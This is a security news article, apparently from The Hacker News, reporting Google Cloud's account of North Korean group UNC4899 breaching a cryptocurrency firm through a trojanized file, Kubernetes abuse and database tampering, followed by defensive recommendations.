UNC4899 Breached Crypto Firm After Developer AirDropped Trojanized File to Work Device
Source: The Hacker News
Ravie Lakshmanan • Mar 09, 2026 • DevOps / Threat Intelligence
The North Korean threat actor known as UNC4899 is suspected to be behind a sophisticated cloud‑compromise campaign that targeted a cryptocurrency organization in 2025, stealing millions of dollars in crypto assets.
The activity has been attributed with moderate confidence to the state‑sponsored adversary, which is also tracked under the cryptonyms Jade Sleet, PUKCHONG, Slow Pisces, and TraderTraitor — see the original report on The Hacker News.
“This incident is notable for its blend of social engineering, exploitation of personal‑to‑corporate device peer‑to‑peer data (P2P) transfer mechanisms, workflows, and eventual pivot to the cloud to employ living‑off‑the‑cloud (LOTC) techniques,” the tech giant noted in its H1 2026 Cloud Threat Horizons Report — PDF (shared with The Hacker News).
Attack Overview
Upon gaining access to the cloud environment, the attackers abused legitimate DevOps workflows to:
- Harvest credentials.
- Break out of container sandboxes.
- Tamper with Cloud SQL databases to facilitate the cryptocurrency theft.
The attack chain, as described by Google Cloud, progressed as follows:
- Initial social‑engineering – The threat actors lured a developer into downloading an archive file purportedly part of an open‑source collaboration.
- Device‑to‑device transfer – The developer moved the archive to a corporate workstation via AirDrop.
- IDE execution – Using an AI‑assisted Integrated Development Environment (IDE), the victim opened the archive, executing malicious Python code that spawned a binary masquerading as the
kubectlcommand‑line tool. - Backdoor establishment – The binary contacted an attacker‑controlled domain, providing a foothold on the corporate machine and enabling pivoting into the Google Cloud environment with likely authenticated sessions and harvested credentials.
- Reconnaissance – The attackers gathered information about services and projects within the cloud tenant.
Further Cloud‑Side Activities
- Bastion host discovery – The adversary located a bastion host and altered its multi‑factor authentication (MFA) policy to gain access, then performed deeper reconnaissance, including pod navigation within Kubernetes.
- Living‑off‑the‑cloud (LotC) persistence – Deployment configurations were modified to execute a Bash command automatically on new pod creation; the command downloaded an additional backdoor.
Notable steps (bullet‑point summary)
- Kubernetes resources tied to the victim’s CI/CD platform were altered to inject commands that logged service‑account tokens.
- A high‑privilege CI/CD service‑account token was harvested, enabling privilege escalation and lateral movement toward a pod handling network policies and load balancing.
- The stolen token authenticated to a privileged infrastructure pod, allowing container escape and deployment of a persistent backdoor.
- Additional reconnaissance targeted a workload managing customer data (user identities, account security, cryptocurrency wallet information).
- Static database credentials stored insecurely in the pod’s environment variables were extracted.
- Those credentials were used via Cloud SQL Auth Proxy to access the production database and execute SQL statements that reset passwords and updated MFA seeds for high‑value accounts.
- Compromised accounts were leveraged to withdraw several million dollars in digital assets.
The above analysis is based on information disclosed by Google Cloud and reported by The Hacker News.
The incident “highlights the critical risks posed by the personal‑to‑corporate P2P data transfer methods and other data bridges, privileged container modes, and the unsecured handling of secrets in a cloud environment,” Google said. “Organizations should adopt a defense‑in‑depth strategy that rigorously validates identity, restricts data transfer on endpoints, and enforces strict isolation within cloud runtime environments to limit the blast radius of an intrusion event.”
Recommendations
- Implement context‑aware access and phishing‑resistant MFA.
- Ensure only trusted images are deployed.
- Isolate compromised nodes from establishing connectivity with external hosts.
- Monitor for unexpected container processes.
- Adopt robust secrets management.
- Enforce policies to disable or restrict peer‑to‑peer file sharing using AirDrop or Bluetooth and mounting of unmanaged external media on corporate devices.